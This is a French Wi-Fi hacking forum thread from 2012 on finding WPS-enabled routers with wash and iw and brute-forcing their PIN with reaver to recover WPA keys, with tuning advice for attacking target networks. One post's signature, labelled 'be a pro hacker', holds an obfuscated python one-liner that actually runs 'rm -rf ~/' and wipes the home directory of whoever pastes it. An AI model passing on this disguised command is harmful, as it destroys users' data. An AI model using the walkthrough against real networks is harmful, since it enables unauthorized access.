Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-10-2012 16:56:53

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

savoir les reseaux wps ou setup protected

salut à tous ,ma question est simple ,comment peut on savoir qu'un reseau utilise un routeur basé wps? et si ce code de 8 chiffres est trouvé ,ca veut dire que la clé wpa aussi revelé ?merci

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-10-2012 17:04:05

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : savoir les reseaux wps ou setup protected

... pas tout compris, mais bon.

Pour avoir la liste des réseaux protégés en WPS, tu peux utiliser "wash" qui fait partie de reaver (le casseur de WPS). C'est déjà installé sur BT5-R3 et ça marche comme ça :

airmon-ng start wlan0
wash -i mon0
# Si tu as beaucoup d'erreurs FCS : 
# wash -C -i mon0
# Voir également les autres options en tapant simplement "wash"

Une fois que le code PIN à 8 chiffres a été trouvé, le routeur t'envoie directement la clé WPA que tu peux utiliser normalement (#facepalm). Mais c'est une attaque qui prend facile 8 à 10 heures et qui n'est pas garantie (si le point d'accès bugge entre-temps) wink

Hors Ligne

#3 01-10-2012 17:38:50

afromoustic
Membre Actif
Inscription : 02-09-2012
Messages : 41

Re : savoir les reseaux wps ou setup protected

Bonsoir

antares145 a écrit :

c'est une attaque qui prend facile 8 à 10 heures

J'imagine avec du matoss performant  smile


oulala ca pic tongue

Hors Ligne

#4 01-10-2012 18:33:54

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : savoir les reseaux wps ou setup protected

[email protected]:~# wash -i mon1


Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>


               
ESSID         BSSID                            Channel         RSSI       WPS Version                WPS Locked       
--------------------------------------------------------------------------------------------------------------

abc              00:19:70:1F:7C:88           1                  00              1.0                                     No               
ADSL8667    08:76:FF:A8:6C:7C           6                  00              1.0                                     No               
   
     
milo             00:19:70:5A:DD:CC          1                00               1.0                                   No               
       
sagem4        08:76:FF:AB:4C:98            1                 00             1.0                                    No               



  ca veux  dire que ces AP n'utilisent pas wps ou contrairement? locked ca veux dire wps desactivé?

Dernière modification par nabbouti (01-10-2012 18:48:01)

Hors Ligne

#5 01-10-2012 19:15:14

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : savoir les reseaux wps ou setup protected

"Locked" veut dire que la fonction est verrouillée, par exemple suite à un trop grand nombre de tentative et/ou d'un bug au niveau du point d'accès. Donc si tu as "locked = yes", tu ne pourras pas attaquer ce réseau avec reaver. "Locked = no" veut dire que tu peux y aller smile

Au passage, les AP qui n'utilisent pas WPS n'apparaissent pas dans Wash wink

[EDIT]@afromoustic : pas forcément, si tu es assez près de la cible une bête carte embarquée de base suffit (si elle supporte le mode monitor). La vitesse d'injection n'a aucune importance ici, l'attaque est limitée par le temps de réponse de l'AP.

Dernière modification par antares145 (01-10-2012 21:17:58)

Hors Ligne

#6 01-10-2012 20:58:42

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : savoir les reseaux wps ou setup protected

merci antares et l'equipe

Hors Ligne

#7 01-10-2012 22:01:59

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : savoir les reseaux wps ou setup protected

afromoustic a écrit :

Bonsoir

antares145 a écrit :

c'est une attaque qui prend facile 8 à 10 heures

J'imagine avec du matoss performant  smile

Une bonne vieiille mini PCI atheros (driver ath5k) d'un vieux portable fait parfaitement l'affaire et tu n'as besoin d'aucune puissance CPU o GPU en particulier, ni de beaucoup de RAM.

Dans de bonnes conditions et avec un routeur bien vulnérable comme le Netgear CG3100N ou le AdBroadband  PDG-A4100N tu vas pouvoir atteindre 1 pin/secondes en ajoutant l'argument -d0, aucun delay entre les pétitions.
Une bonne façon de voir si ton routeur et de ceux qui "craignent" c'est de lancer directement l'attaque avec "-d 0" et avec l'option --v (verbose).
Ou ça passe, ou se casse, mais si ça passe et que tu arrive à lancer plus de 10 PIN (pas de blocage) tu vas très probablement fondre la clef en moins de 5 heures.
Reaver wps cracke la première partie du PIN, puis la seconde. Dans cette dernière nous connaissons le dernier chiffre car il est un checksum des autres.
Nous avons donc un premier crack pour obtenir la première moitié du PIN de 10⁴ possibilités et un second crack de 10³ possibilités.
Ce qui dans des conditions parfaite et avec un routeur bien vulnérable devrait faire quelque chose comme  10000 divisé par 3600 = 2,7 Heures,  disons 3 heures maximum, pour le premier block du PIN (en gardant bien le rythme parfait 1second/attempt et avec peu de "time out" - réponses perdues).
Personnellement j'ai obtenu ça sur les deux routeurs cités plus haut, le PWR dans airodump-ng ne doit pas forcément être très bon, par contre le RXQ doit être rivé à 100.
Pour la deuxième partie du PIN il est préférable faire une pause et reprendre la session en enlevant l'argument -d 0 et laisser la valeur par défaut (qui est de 1 sgonde ).
Ceci parce que avec reaver, à partir de la deuxième moitié du PIN, le processus est plus long (reaver envoie un M2 et en plus un M4 et un M6) et le retour envoie deux réponse au lieu d'une et doit effectuer deux comprobations, le double de travail, et généralement en ne laissant aucun délai entre les PIN le routeur sature et répond une fois sur deux, l'avantage de ne mettre aucun délai est perdu et comme procéder un timeout prends pas mal de temps, on alourdi le procédé.
Mais bon, en comptant queqlue chose comme 2-3seconds/attempt ça te fait dans le pire des cas une heure en plus.

Une grande partie des routeurs qui sont vulnérables n'encaissent pas cette cadence, un taux de 3-4 seconde par PIN correctement envoyé et reçu est plus réaliste si on veut se faire une idée "en moyenne" du rendement de reaver sur les AP vulnérables.
Et là on est dans les valeurs que te donnait antares _145, avec un peu de chance tu trouve la première moitié du PIN avant d'avoir effectué 30 % de l'attaque et dans ce cas tu auras probablement pliés ton affaire en moins de 8 heures, si par contre tu n'as pas trop de chance et doive effectuer  plus de 80% du brute force sur le premier block du PIN, tu devras attendre bien plus de 8 heures, reaver est pour moi une arme nocturne, tu lance l'attaque avant de dormir, vérifie que tout se déroule correctement, tu éteins la lumière, fais un bon gros dodo et tu regarde le lendemain matin.

Hors Ligne

#8 02-10-2012 08:58:48

afromoustic
Membre Actif
Inscription : 02-09-2012
Messages : 41

Re : savoir les reseaux wps ou setup protected

merci kcdtv

avent de ma-taquer a ça je vais aller doucement est m'amuser smile !!
avec du wep smile

merci pour ces explication plus_un ,
trop complexe pour moi.. .


oulala ca pic tongue

Hors Ligne

#9 02-10-2012 22:36:09

o554700
Membre Actif
Lieu : Telestra!
Inscription : 26-09-2012
Messages : 36

Re : savoir les reseaux wps ou setup protected

afromoustic a écrit :

merci kcdtv

avent de ma-taquer a ça je vais aller doucement est m'amuser smile !!
avec du wep smile

C'est pas le sujet du topic, mais à mes yeux, il vaut mieux commener avec le WPA qui est plus facile à maitriser que du crack WEP.

Le WPA, il n'y a qu'un moyen de choper le handshake et si c'est possible c'est vite fait.
Le WPA par WPS aussi, ultra facile à réaliser si le PA répond bien.
Le WEP par contre, t'as plusieurs cas et types d'attaques différentes.


Telestra !

Hors Ligne

#10 03-10-2012 09:04:08

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : savoir les reseaux wps ou setup protected

Ou alors, avec les outils gentils :
iw est un outil qui est dans les dépôts debian.

 iw wlan0 scan 
BSS 00:1f:9f:fd:35:13 (on wlan0)
	TSF: 213004229991 usec (2d, 11:10:04)
	freq: 2412
	beacon interval: 100
	capability: ESS Privacy ShortSlotTime (0x0411)
	signal: -87.00 dBm
	last seen: 3272 ms ago
	SSID: Bbox-1073C9
	Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 
	DS Parameter set: channel 1
	ERP: <no flags>
	RSN:	 * Version: 1
		 * Group cipher: TKIP
		 * Pairwise ciphers: CCMP
		 * Authentication suites: PSK
		 * Capabilities: 16-PTKSA-RC (0x000c)
	Extended supported rates: 6.0 9.0 12.0 48.0 
	WPS:	 * Version: 1.0                                                  \o/
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * Response Type: 3 (AP)
		 * UUID: dae3ccb1-e582-54fd-ae6f-da5b23b73a2a
		 * Manufacturer: THOMSON
		 * Model: Thomson TG
		 * Model Number: 787
		 * Serial Number: 1005AH6AH
		 * Primary Device Type: 6-0050f204-1
		 * Device name: Thomson TG787
		 * Config methods: Label, PBC
		 * RF Bands: 0x0
	WPA:	 * Version: 1
		 * Group cipher: TKIP
		 * Pairwise ciphers: TKIP
		 * Authentication suites: PSK
	WMM:	 * Parameter version 1
		 * BE: CW 15-1023, AIFSN 3
		 * BK: CW 15-1023, AIFSN 7
		 * VI: CW 7-15, AIFSN 2, TXOP 3008 usec
		 * VO: CW 3-7, AIFSN 2, TXOP 1504 usec

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 03-10-2012 12:47:44

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : savoir les reseaux wps ou setup protected

Bien vu spawn smile

Hors Ligne

#12 03-10-2012 14:17:36

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : savoir les reseaux wps ou setup protected

o554700 a écrit :

C'est pas le sujet du topic, mais à mes yeux, il vaut mieux commener avec le WPA qui est plus facile à maitriser que du crack WEP.

Le WPA, il n'y a qu'un moyen de choper le handshake et si c'est possible c'est vite fait.
Le WPA par WPS aussi, ultra facile à réaliser si le PA répond bien.
Le WEP par contre, t'as plusieurs cas et types d'attaques différentes.

... sauf que le crack WPA n'a pas un résultat garanti, il faut que la clé soit dans le dico utilisé (ce qui, à moins d'avoir de la chance ou un très bon dico, est assez rare). le WEP c'est plus technique mais la clé quelle qu'elle soit finit quasi toujours par tomber. C'est plus gratifiant smile

Bien vu pour le "iw" Spawn, il donne beaucoup plus d'infos que iwlist. A noter que pour que reaver puisse fonctionner, il faut que le WPS soit activé ET que la méthode PIN soit autorisée (ce qui ne semble pas être le cas sur l'exemple que tu donnes). Ou alors je me trompe et ça correspond à "Label" ?

Dernière modification par antares145 (03-10-2012 14:19:02)

Hors Ligne

#13 04-10-2012 17:27:23

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : savoir les reseaux wps ou setup protected

antares_145 a écrit :

il faut que le WPS soit activé ET que la méthode PIN soit autorisée

En théorie c'est bien ça mais peut être para malchance quelqu'un peut avoir un routeur Lynksis (marque CISCO, pas les premiers venus théoriquement) comme celui de notre ami TAPE >
A day with TAPE : Cracking WPA using the WPS vulnerability with reaver v1.3

TAPE a écrit :

Now as soon as I had heard about this tool, I immediately checked to make sure that WPS was not configured on my router.
As I always configure it manually, I was pretty sure WPS was disabled, and as I thought, WPS was not configured.
Router information ; Cisco Linksys E1000 v2.0, Firmware v. 2.0.01
I checked the router settings, made sure WPS was not configured then rebooted router ;

wps01.jpg


Little did I know that even though I had chosen to not to use WPS, WPS was not in fact disabled and the router was still vulnerable, which I found out after seeing it was mentioned to be the case on the BackTrack forums and checking my own setup lateron ...

"Awsome!" comme disent nos amis outre Atlantique.
WPS Vulnerability status update for Linksys devices

C'est assez fort avec quelle autosuffisance ils répondent à leur consomateurs en AVRIL!
"We are aware of...", Bien! On est rassurés parce que nous ça faisait à l'époque plus de 4 mois qu'on était "aware of" avec apparemment une certaine petite censure latente histoire que la nouvelle reste confinée.
Linksys WPS issues censorchip
Le ridicule ne tue pas, en voici la preuve.

Hors Ligne

#14 05-10-2012 23:29:42

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : savoir les reseaux wps ou setup protected

Ca c'est quand meme très fort wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
253 136066 17-09-2016 22:11:01 par Zetta
5 291 22-08-2016 12:44:33 par berber2
5 1858 21-08-2016 19:48:53 par M!C
9 678 23-11-2015 13:02:22 par Furyo
2 836 30-08-2015 22:42:31 par M1ck3y

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.048 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]